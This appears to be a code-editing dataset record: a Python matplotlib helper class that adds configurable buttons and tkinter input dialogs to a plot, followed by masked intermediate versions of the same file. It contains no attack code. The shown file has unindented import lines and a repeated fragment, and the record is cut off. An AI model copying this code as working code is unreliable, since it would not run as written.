                value = tksimpledialog.askfloat(title, startvalue,
                                                minvalue=minval,
                                                maxvalue=maxval)
            else:
                value = tksimpledialog.askstring(title, startvalue)
            self.data[name] = value
            root.destroy()

    def end(self, event):
        """
        Event for clicking the finish button - closes the graph

        :param event: event passed to function (unused)
        :return: None
        """
        plt.close()

    def button_region(self, event):
        """
        Return the index of the button region containing the click, or None.

        NOTE(review): uses event.canvas.geometry(), which looks
        Qt-backend-specific -- confirm behaviour on other backends.

        :param event: matplotlib mouse event with .x/.y in pixels
        :return: int index into self.regions, or None
        """
        if len(self.regions) == 0:
            return None
        x, y = event.x, event.y
        width = event.canvas.geometry().width()
        height = event.canvas.geometry().height()
        for r, rn in enumerate(self.regions):
            # convert the figure-fraction region to pixel corners
            rn1 = [rn[0] * width, rn[1] * height,
                   (rn[0] + rn[2]) * width, (rn[1] + rn[3]) * height]
            cond1 = (x > rn1[0]) & (x < rn1[2])
            cond2 = (y > rn1[1]) & (y < rn1[3])
            if cond1 and cond2:
                return r
        return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 17/02/17 at 11:48 PM
@author: neil
Program description here
Version 0.0.1
"""
import matplotlib.pyplot as plt
from matplotlib.widgets import Button
import sys
# detect python version
# if python 3 do this:
if (sys.version_info > (3, 0)):
import tkinter
import tkinter.simpledialog as tksimpledialog
else:
import Tkinter as tkinter
import tkSimpleDialog as tksimpledialog
# =============================================================================
# Define Class. Methods and Functions
# =============================================================================
class Add_Buttons(object):
    """
    Adds a row of configurable buttons along the bottom of a matplotlib
    figure; each button is bound to one of the supported actions
    (NEXT, PREVIOUS, CLOSE, OPTION, UINPUT).
    """

    def __init__(self, ax=None, **kwargs):
        """
        Adds a select rectangle feature to any matplotlib axis, with select,
        clear all, and finish buttons

        :param ax: matplotlib axis, the frame to add the selector to
        :param kwargs: keyword arguments, currently supported:

            button_labels - list of strings
                            defines the name of each button to be displayed
                            Must be of length 1 or greater
            button_actions - list of strings
                             defines the action of each button. Must be same
                             length as button_labels
                             currently supported actions are:
                             "NEXT" - move to next plot (self.result set to 1)
                             "PREVIOUS" - move to previous plot
                                          (self.result set to -1)
                             "CLOSE" - closes the plot
                             "OPTION" - self.result set to the button label
                             "UINPUT" - asks user for an input
            button_params - list of dictionaries (optional)
                            if defined must be same length as button_labels,
                            one dictionary per button; keys include
                            "close" - when used with "OPTION" action, close
                                      the plot after the button is clicked
        """
        # set supported actions (and link to function)
        self.actions = dict(NEXT=self.next,
                            PREVIOUS=self.previous,
                            CLOSE=self.end,
                            OPTION=self.option,
                            UINPUT=self.uinput)
        self.supported_actions = list(self.actions.keys())
        # current button params
        self.buttons = []
        self.regions = []
        # result (1, 0, -1, or string)
        self.result = 0
        # storage for values collected from UINPUT dialogs
        self.data = dict()
        # Deal with having no matplotlib axis
        if ax is None:
            self.ax = plt.gca()
        else:
            self.ax = ax
        # load keyword arguments
        if kwargs is None:
            kwargs = dict()
        self.button_labels = kwargs.get('button_labels', ['Close'])
        self.num_buttons = len(self.button_labels)
        self.button_actions = kwargs.get('button_actions', ['CLOSE'])
        # bug fix: build one distinct dict per button -- ``[dict()] * n``
        # would alias a single shared dict across every button
        dparams = [dict() for _ in range(self.num_buttons)]
        self.button_params = kwargs.get('button_params', dparams)
        # check inputs are correct
        self.validate_inputs()
        # create buttons
        self.create_buttons()

    def validate_inputs(self):
        """
        Validate the button configuration supplied to the constructor.

        :raises TypeError: if button_labels/button_actions are not lists of
                           strings, or button_params is not a list of dicts
        :raises ValueError: if the lists are empty or mismatched in length,
                            or an action is not a supported action
        """
        # Make sure button labels is in correct format
        try:
            self.button_labels = list(self.button_labels)
            for it in self.button_labels:
                if type(it) != str:
                    raise TypeError()
        except TypeError:
            raise TypeError("Button labels must be a list of strings")
        # Make sure button actions is in correct format
        # (bug fix: this loop previously iterated over button_labels)
        try:
            self.button_actions = list(self.button_actions)
            for it in self.button_actions:
                if type(it) != str:
                    raise TypeError()
        except TypeError:
            raise TypeError("Button actions must be a list of strings")
        # Make sure button params is in correct format
        # (bug fix: this previously re-listified button_actions instead of
        # button_params)
        try:
            self.button_params = list(self.button_params)
            for it in self.button_params:
                if type(it) != dict:
                    raise TypeError()
        except TypeError:
            raise TypeError("Button params must be a list of dictionaries")
        # Make sure lists are not empty and same length
        if len(self.button_labels) < 1:
            raise ValueError("'button_labels' Must have at least one button "
                             "label in list.")
        if len(self.button_actions) != len(self.button_labels):
            raise ValueError("'button_actions' must be the same length "
                             "as 'button_labels")
        self.num_buttons = len(self.button_labels)
        # Make sure all button actions are supported
        sstr = ', '.join(self.supported_actions)
        for action in self.button_actions:
            if action not in self.supported_actions:
                e1 = "Action '{0}' not currently".format(action)
                e2 = "supported. \n Currently supported actions are: \n"
                raise ValueError(e1 + e2 + sstr)

    def create_buttons(self, width=0.2):
        """
        Create a set of buttons along the bottom axis of the figure.

        :param width: float, width of each button in figure fraction; must
                      be less than 1.0/num_buttons
        :return: None
        """
        b_N, b_length = self.num_buttons, width
        # even horizontal gap so the row is spread across the figure
        b_sep = (1. / (b_N + 1)) * (1 - b_N * b_length)
        for b in range(b_N):
            start = (b + 1) * b_sep + b * b_length
            self.regions.append([start, 0.05, b_length, 0.075])
        # adjust the figure to make room for the button row
        plt.subplots_adjust(bottom=0.25)
        # populate buttons and bind each one to its action handler
        for b in range(b_N):
            axbutton = plt.axes(self.regions[b])
            button = Button(axbutton, self.button_labels[b])
            button.on_clicked(self.actions[self.button_actions[b]])
            self.buttons.append(button)

    def next(self, event):
        """
        Event for clicking a button with action "NEXT"; sets self.result
        to 1.

        :param event: matplotlib event passed to the handler (unused)
        :return: None
        """
        self.result = 1

    def previous(self, event):
        """
        Event for clicking a button with action "PREVIOUS"; sets self.result
        to -1.

        :param event: matplotlib event passed to the handler (unused)
        :return: None
        """
        self.result = -1

    def option(self, event):
        """
        Event for clicking a button with action "OPTION"

        Sets self.result to the label of the clicked button, runs the
        optional 'func' callback and closes the plot if 'close' is set.

        :param event: matplotlib mouse event passed to the handler
        :return: None
        """
        pos = self.button_region(event)
        if pos is not None:
            self.result = self.button_labels[pos]
            close = self.button_params[pos].get('close', False)
            func = self.button_params[pos].get('func', None)
            if func is not None:
                func()
            if close:
                plt.close()

    def uinput(self, event):
        """
        Event for clicking a button with action "UINPUT"

        Pops up a tkinter dialog asking the user for a value; the value is
        stored in self.data under the 'name' key of the button's params.

        :param event: matplotlib mouse event passed to the handler
        :return: None
        """
        pos = self.button_region(event)
        if pos is not None:
            props = self.button_params[pos]
            title = props.get('title', 'Enter a Value')
            startvalue = props.get('comment', 'Message')
            name = props.get('name', 'x')
            fmt = props.get('fmt', None)
            minval = props.get('minval', None)
            maxval = props.get('maxval', None)
            # hidden root window so only the dialog itself is shown
            root = tkinter.Tk()
            root.withdraw()
            # pick the dialog matching the requested value type
            if fmt == int:
                value = tksimpledialog.askinteger(title, startvalue,
                                                  minvalue=minval,
                                                  maxvalue=maxval)
            elif fmt == float:
                value = tksimpledialog.askfloat(title, startvalue,
                                                minvalue=minval,
                                                maxvalue=maxval)
            else:
                value = tksimpledialog.askstring(title, startvalue)
            self.data[name] = value
            root.destroy()

    def end(self, event):
        """
        Event for clicking the finish button - closes the graph

        :param event: event passed to function (unused)
        :return: None
        """
        plt.close()

    def button_region(self, event):
        """
        Return the index of the button region containing the click, or None.

        NOTE(review): uses event.canvas.geometry(), which looks
        Qt-backend-specific -- confirm behaviour on other backends.

        :param event: matplotlib mouse event with .x/.y in pixels
        :return: int index into self.regions, or None
        """
        if len(self.regions) == 0:
            return None
        # get mouse click location in pixels
        x, y = event.x, event.y
        # get the current canvas width and height (in pixels)
        width = event.canvas.geometry().width()
        height = event.canvas.geometry().height()
        # loop round each button region
        for r, rn in enumerate(self.regions):
            # convert region to pixels
            rn1 = [rn[0]*width, rn[1]*height,
                   (rn[0] + rn[2])*width, (rn[1] + rn[3])*height]
            # test whether x, y are in region
            cond1 = (x > rn1[0]) & (x < rn1[2])
            cond2 = (y > rn1[1]) & (y < rn1[3])
            if cond1 and cond2:
                return r
        return None
# =============================================================================
# Start of code
# =============================================================================
# Main code to test the rectangle selector
if __name__ == '__main__':
    # Demo: scatter plot with a user-input button and a close button.
    import numpy as np
    # plt.close()
    # fig, frame = plt.subplots(ncols=1, nrows=1)
    # x = np.random.rand(100)
    # y = np.random.rand(100)
    # plt.scatter(x, y, color='k', marker='o', s=20)
    # odict = dict(close=True)
    # a = Add_Buttons(ax=frame,
    #                 button_labels=['A', 'B'],
    #                 button_actions=['OPTION', 'OPTION'],
    #                 button_params=[odict, odict])
    # plt.show()
    # plt.close()
    plt.close()
    fig, frame = plt.subplots(ncols=1, nrows=1)
    # random scatter data so the demo has something to draw
    x = np.random.rand(100)
    y = np.random.rand(100)
    plt.scatter(x, y, color='k', marker='o', s=20)
    # 'close' makes the OPTION button close the figure when clicked
    odict = dict(close=True)
    # UINPUT button config: ask for an integer named 'x' in [4, 10]
    udict = dict(name='x', fmt=int, title='Enter value',
                 comment='Please enter x in meters.', minval=4, maxval=10)
    a = Add_Buttons(ax=frame,
                    button_labels=['Enter value', 'Close'],
                    button_actions=['UINPUT', 'OPTION'],
                    button_params=[udict, odict])
    plt.show()
    plt.close()
# =============================================================================
# End of code
# =============================================================================
|
flexible
|
{
"blob_id": "1576693264a334153c2752ab6b3b4b65daa7c37c",
"index": 8928,
"step-1": "<mask token>\n\n\nclass Add_Buttons(object):\n <mask token>\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. 
\\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n <mask token>\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n <mask token>\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 
and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = 
list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. 
\\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n <mask token>\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, 
rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = 
list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. 
\\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n plt.subplots_adjust(bottom=0.25)\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = 
props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = 
list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. 
\\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n plt.subplots_adjust(bottom=0.25)\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n\n def next(self, event):\n \"\"\"\n Event for clicking a button with action \"NEXT\"\n \n Sets self.result to 1\n \n :param event: \n :return: \n \"\"\"\n self.result = 1\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n 
startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 17/02/17 at 11:48 PM\n\n@author: neil\n\nProgram description here\n\nVersion 0.0.1\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Button\nimport sys\n# detect python version\n# if python 3 do this:\nif (sys.version_info > (3, 0)):\n import tkinter\n import tkinter.simpledialog as tksimpledialog\nelse:\n import Tkinter as tkinter\n import tkSimpleDialog as tksimpledialog\n\n# =============================================================================\n# Define Class. Methods and Functions\n# =============================================================================\nclass Add_Buttons(object):\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. 
Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n # set supported actions (and link to function)\n self.actions = dict(NEXT=self.next,\n PREVIOUS=self.previous,\n CLOSE=self.end,\n OPTION=self.option,\n UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n # current button params\n self.buttons = []\n self.regions = []\n # result (1, 0, -1, or string)\n self.result = 0\n # storage\n self.data = dict()\n # Deal with having no matplotlib axis\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n # load keyword arguments\n if kwargs is None:\n kwargs = dict()\n self.button_labels = 